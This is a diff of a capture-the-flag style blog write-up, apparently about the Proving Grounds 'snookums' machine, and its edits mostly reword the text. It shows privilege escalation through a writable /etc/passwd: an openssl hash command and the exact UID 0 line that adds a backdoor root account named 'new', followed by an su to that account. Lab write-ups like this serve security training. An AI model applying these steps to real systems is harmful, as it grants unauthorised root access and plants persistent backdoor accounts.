Ha-L0/Ha-L0.github.io/_posts/2022-10-12-[H4]-Proving-Grounds-Practice-snookums.md

 > It worked!
 {: .prompt-info }

-We are now user `michael` but the goal is to gain `root` access to the system.
+We are user `michael`, but the goal is to gain `root` access to the system.
 So, we now check some basic escalation techniques to check if we can elevate our privileges to `root`.

 > The file `/etc/passwd` is writeable.
 {: .prompt-info }

-We are now creating a hash for a new user with `root` privileges we add to the system.
+We are now creating a `hash` for a new user we want add to the system.
 ```bash
 $ openssl passwd -1 -salt new 123
 $1$new$p7ptkEKU1HnaHpRtzNizS1
 ```
-We are appending the following line to the file `/etc/passwd`.
+Appending the following line to the file `/etc/passwd` will create a `root` user with the name `new`.

 `new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash`

-Now we can switch to our new created user (`new:123`).
+Now we can switch to our newly created `root` user (`new:123`).
 ```bash
 [michael@snookums tmp]$ su new
 Password: